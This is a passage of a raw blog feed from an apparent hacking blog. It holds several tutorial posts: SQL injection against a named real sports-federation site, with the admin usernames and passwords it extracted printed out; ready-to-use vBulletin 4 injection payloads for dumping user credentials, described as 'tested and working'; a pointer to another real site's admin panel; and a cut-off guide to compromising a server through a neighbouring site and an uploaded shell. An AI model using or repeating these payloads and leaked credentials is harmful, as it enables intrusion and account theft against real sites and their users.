href="http://www.ettu.org/news_view.php?id=-2583+union+select+1,group_concat(id,0x3a,login,0x3a,password),3,4,5,6,7,8,9,10,1%E2%80%8B1,12,13,14,15,16+" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.ettu.org/news_view.php?id=-25...,14,15,16+&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;from+0910ettucup01_admin--&lt;br /&gt;&lt;br /&gt;Damn the usernames and passwords are displayed at the site.So let explain here what we have done.We have changed information_schema.columns into the table name 'cuz we dont need not to read the columns 'cuz we already put them into the group_concat() you see id login password those are columns now from where to be selected from the table name 0910ettucup01_admin and now we have our login details:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;1:adminvitesse:vitesse2006&lt;br /&gt;&lt;br /&gt;2:admin:matchvitesse&lt;br /&gt;&lt;br /&gt;All it left now is to find the Admin Panel....&lt;br /&gt;&lt;br /&gt;12.Finding Admin Panel&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Unfortunatly our live example site doesn't have an admin panel so for this to show you i'll took another site.So when you got the admin details we need to login somewhere that somewhere is called Admin Panel or ControlPanel or WebPanel its same or you can say it Login Page.To find an login page you can use many tools ill tell you some in the next part.An example of an login page&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.discountexpress.co.uk/admin/" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;http://www.discountexpress.co.uk/admin/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There you can enter the login info and get into the site and change alot&lt;br /&gt;&lt;br /&gt;13.Tools&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So tools,there aren't so much tools to use when your doing this but there are a few that will help you a lot.&lt;br /&gt;&lt;br /&gt;13.1.Admin Finder&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Admin finder is a tool that helps you to find the admin page or Login Page very quick for this you can use many online or you can use some webscanner to find it.Here are 1 Good program and one good Online Scanner&lt;br /&gt;&lt;br /&gt;Online Admin Page Scanner&lt;br /&gt;&lt;br /&gt;And for download&lt;br /&gt;&lt;br /&gt;Acunetix Web Vulnerability Scanner&lt;br /&gt;&lt;br /&gt;=&amp;gt;This scanner could be used for more things but now we are not going to talk about them&lt;br /&gt;&lt;br /&gt;13.2 Hacking Tools that are making you're work easier&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Well we all know that some of you have started with tools ex.Havij or MySQL Helper.Yes they are good in hand expecialy when we are hacking into a MySQL Server &amp;gt;5 that are guessing the table and column names so that is realy good also Havij is a great program that have Admin Finder too and MD5 Section where you can easly search about 10-12 MD5 Decripting sites so yes its realy good program but dont use it for hacking all the way into the server 'cuz it leaves a lotz of logs and you my be finish in jail&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-3589687905346555662?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/3589687905346555662/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/mysql-injectionfull-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/3589687905346555662'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/3589687905346555662'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/mysql-injectionfull-tutorial.html' title='MySQL Injection[FULL TUTORIAL]'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-4900608690906278208</id><published>2012-02-01T22:29:00.002+06:00</published><updated>2012-02-01T22:29:30.926+06:00</updated><title type='text'>SQL Injection On Vbulletin 4 [Group Exploit]</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span class="smalltext" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 11px;"&gt;&lt;strong&gt;SQL Injection On Vbulletin 4 [Group Exploit]&lt;/strong&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="post_body" id="pid_350998" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"&gt;Hey fellas,&lt;br /&gt;Its been long time since i have posted a new tutorial . BUt like always , here is yet another quality tutorial&lt;br /&gt;So most of us refer vbulletin as invulnerable . But , nothing is unvulnerable &amp;gt;&amp;nbsp;So here is how to do it .&lt;br /&gt;&lt;br /&gt;1.First get ,&amp;nbsp;&lt;a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;Mozilla Firefox 3.6.17&lt;/a&gt;&lt;br /&gt;2.Download the&amp;nbsp;&lt;a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;Live HTTP Headers&lt;/a&gt;&amp;nbsp;addon for Mozilla Firefox.&lt;br /&gt;3.Go to google and search this :&lt;br /&gt;&lt;blockquote style="background-color: #121212; border-bottom-color: rgb(43, 43, 43); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(43, 43, 43); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(43, 43, 43); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(43, 43, 43); border-top-style: solid; border-top-width: 1px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;cite style="background-color: #0a0a0a; border-bottom-color: rgb(32, 32, 32); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(32, 32, 32); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(32, 32, 32); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(32, 32, 32); border-top-style: solid; border-top-width: 1px; display: block; font-family: 'Times New Roman', Times, serif; font-style: normal; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; padding-bottom: 3px; padding-left: 3px; padding-right: 3px; padding-top: 3px;"&gt;Quote:&lt;/cite&gt;insite: Powered by vBulletin™ Version 4.1.2&lt;/blockquote&gt;4.Find a website that has forum version 4.0.0 to 4.1.2.&lt;br /&gt;5.Now you need to be sure that groups are enabled for that website . Make sure it has groups or this will not work .&lt;br /&gt;6. Now make an account on that forum .&lt;br /&gt;7.Verify your account&lt;br /&gt;8.Now go to the groups section and copy any of the group name .&lt;br /&gt;9.Click on Advanced Search on the top.&lt;br /&gt;10.Open the newly installed addon called LIVE HTTP headers. (Tools -&amp;gt; Liver HTTP Headers)&lt;br /&gt;11. Now click on clear if the page is full.Make sure Capture is ticked or selected.&lt;br /&gt;12.Now paste the group name in the "Keyword(s)" .&lt;br /&gt;13.Make sure "Search Titles Only is selected .&lt;br /&gt;14. Now click Search and make sure you are capturing on your live feed header.&lt;br /&gt;15.So now you must get the group . If you have not , then you possibly did something wrong .Don't worry,try it again !&lt;br /&gt;16.Now go to Live HTTP headers and scroll to the top.&lt;br /&gt;17.Now you need to search for something like this : "type%5B%5D=7"It must be easily found and mostly is found underneath content length.&lt;br /&gt;18.Select it so it is highlighted then click on replay.&lt;br /&gt;19.Now a pop up box will appear with "process&amp;amp;searchthreadid=" at the end.&lt;br /&gt;20.Now put any of these in the box according to your needs :&lt;br /&gt;&lt;br /&gt;To see database:&lt;br /&gt;&lt;blockquote style="background-color: #121212; border-bottom-color: rgb(43, 43, 43); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(43, 43, 43); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(43, 43, 43); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(43, 43, 43); border-top-style: solid; border-top-width: 1px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;cite style="background-color: #0a0a0a; border-bottom-color: rgb(32, 32, 32); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(32, 32, 32); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(32, 32, 32); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(32, 32, 32); border-top-style: solid; border-top-width: 1px; display: block; font-family: 'Times New Roman', Times, serif; font-style: normal; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; padding-bottom: 3px; padding-left: 3px; padding-right: 3px; padding-top: 3px;"&gt;Quote:&lt;/cite&gt;&amp;amp;cat[0]=1) UNION SELECT database()#&lt;/blockquote&gt;&lt;br /&gt;To see tables:&lt;br /&gt;&lt;blockquote style="background-color: #121212; border-bottom-color: rgb(43, 43, 43); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(43, 43, 43); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(43, 43, 43); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(43, 43, 43); border-top-style: solid; border-top-width: 1px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;cite style="background-color: #0a0a0a; border-bottom-color: rgb(32, 32, 32); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(32, 32, 32); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(32, 32, 32); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(32, 32, 32); border-top-style: solid; border-top-width: 1px; display: block; font-family: 'Times New Roman', Times, serif; font-style: normal; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; padding-bottom: 3px; padding-left: 3px; padding-right: 3px; padding-top: 3px;"&gt;Quote:&lt;/cite&gt;&amp;amp;cat[0]=1) UNION SELECT table_name FROM information_schema.tables#&lt;/blockquote&gt;To see information on the first user:&lt;br /&gt;&lt;blockquote style="background-color: #121212; border-bottom-color: rgb(43, 43, 43); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(43, 43, 43); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(43, 43, 43); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(43, 43, 43); border-top-style: solid; border-top-width: 1px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;cite style="background-color: #0a0a0a; border-bottom-color: rgb(32, 32, 32); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(32, 32, 32); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(32, 32, 32); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(32, 32, 32); border-top-style: solid; border-top-width: 1px; display: block; font-family: 'Times New Roman', Times, serif; font-style: normal; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; padding-bottom: 3px; padding-left: 3px; padding-right: 3px; padding-top: 3px;"&gt;Quote:&lt;/cite&gt;&amp;amp;cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Now anyone can do the rest. It is tested and working&lt;br /&gt;Hope you like my tutorial.&lt;br /&gt;Thanks for reading.&lt;/div&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-4900608690906278208?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/4900608690906278208/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/sql-injection-on-vbulletin-4-group.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/4900608690906278208'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/4900608690906278208'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/sql-injection-on-vbulletin-4-group.html' title='SQL Injection On Vbulletin 4 [Group Exploit]'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-1861716240496758824</id><published>2012-02-01T22:23:00.000+06:00</published><updated>2012-02-01T22:23:20.240+06:00</updated><title type='text'>Make search engine with your name or whatever you want!!</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana; line-height: 22px; text-align: center;"&gt;im going to show u web page that you can change your search engine with your name or whatever you want.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana; line-height: 22px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana; line-height: 22px; text-align: center;"&gt;and also it can set as homepage of google.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana; line-height: 22px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana; line-height: 22px; text-align: center;" /&gt;&lt;img alt="[Image: shinysearch.jpg]" border="0" src="http://media01.money4invest.com/2009/10/shinysearch.jpg" style="background-color: #333333; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; color: white; font-family: Verdana; line-height: 22px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana; line-height: 22px; text-align: center;" /&gt;&lt;img alt="[Image: shinysearch.jpg]" border="0" src="http://3.bp.blogspot.com/_jmwfoKFuFj8/S_K3HGVyjNI/AAAAAAAAAK4/oA3rZf1rkVA/s320/shinysearch.jpg" style="background-color: #333333; border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; color: white; font-family: Verdana; line-height: 22px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana; line-height: 22px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana; line-height: 22px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: red; font-family: Verdana; line-height: 22px; text-align: center;"&gt;&lt;a href="http://adf.ly/4zr3j" style="color: #7fd4ff; text-decoration: none;" target="_blank"&gt;HOMEPAGE&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-1861716240496758824?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/1861716240496758824/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/make-search-engine-with-your-name-or.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/1861716240496758824'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/1861716240496758824'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/make-search-engine-with-your-name-or.html' title='Make search engine with your name or whatever you want!!'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_jmwfoKFuFj8/S_K3HGVyjNI/AAAAAAAAAK4/oA3rZf1rkVA/s72-c/shinysearch.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-8162364883870101592</id><published>2012-02-01T22:13:00.000+06:00</published><updated>2012-02-01T22:13:12.974+06:00</updated><title type='text'>HOW TO HACK UNHACKABLE SITE</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;span style="color: red;"&gt;&lt;span style="font-weight: bold;"&gt;Introduction&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Sometimes site that is your TARGET just isn't hackable. Even Acunetix Web Security Scanner can't find useful vulnerability. In that kind of situation the only thing that might work is to hack site (backdoor site) that is on same server and through that site and through server to penetrate the site.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;span style="color: red;"&gt;&lt;span style="font-weight: bold;"&gt;Tools required:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;GNY.Shell&lt;/span&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;span style="color: red;"&gt;&lt;span style="font-weight: bold;"&gt;Finding Backdoor Site&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;To find backdoor site go to&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-color: #333333; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(0, 0, 0); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(51, 148, 190); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.domaintools.com/&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;and in Whois Lookup enter your&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;TARGET&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;site&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://dippic.com/ttvofzahtmny" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;&lt;img alt="[Image: ttvofzahtmny.png]" border="0" height="188" src="http://d1.dipads.net/i/00025/ttvofzahtmny.png" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="640" /&gt;&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;As a result you'll get&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;Whois Record&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://dippic.com/yj4zgv59y870" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;&lt;img alt="[Image: yj4zgv59y870.png]" border="0" height="389" src="http://d1.dipads.net/i/00025/yj4zgv59y870.png" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="640" /&gt;&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Look for&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;Reverse IP&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;In our case 25 other sites hosted on this server.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Click on it to see names of the hosted sites on the same server.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://dippic.com/g9gw24idoktm" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;&lt;img alt="[Image: g9gw24idoktm.png]" border="0" height="385" src="http://d1.dipads.net/i/00025/g9gw24idoktm.png" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="640" /&gt;&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;You will see few of them, to see all, click on&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;&amp;nbsp;more...&lt;/span&gt;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;To see them all you must be a member.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;You can easily Sign up for a FREE account by cicking on&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;span style="font-weight: bold;"&gt;Create an Account&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;(use some anonymous email service for that)&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;As a member you can see all 25 other sites hosted on that server.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;span style="color: red;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Hacking Backdoor Site&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Here we have 25 potentional backdoor sites and our target one.&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Let's say after analysing we find that our backdoor sites No17 (as example) and target No22&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://dippic.com/8lgqjhj76hqz" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;&lt;img alt="[Image: 8lgqjhj76hqz.png]" border="0" height="423" src="http://d1.dipads.net/i/00025/8lgqjhj76hqz.png" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="640" /&gt;&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;Backdoor site can be any one from the list who can be hacked and sell uploaded&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://dippic.com/rq9k3vq8go5k" style="background-color: #333333; color: #7fd4ff; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;&lt;img alt="[Image: rq9k3vq8go5k.png]" border="0" height="401" src="http://d1.dipads.net/i/00025/rq9k3vq8go5k.png" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="640" /&gt;&lt;/a&gt;&lt;br style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" 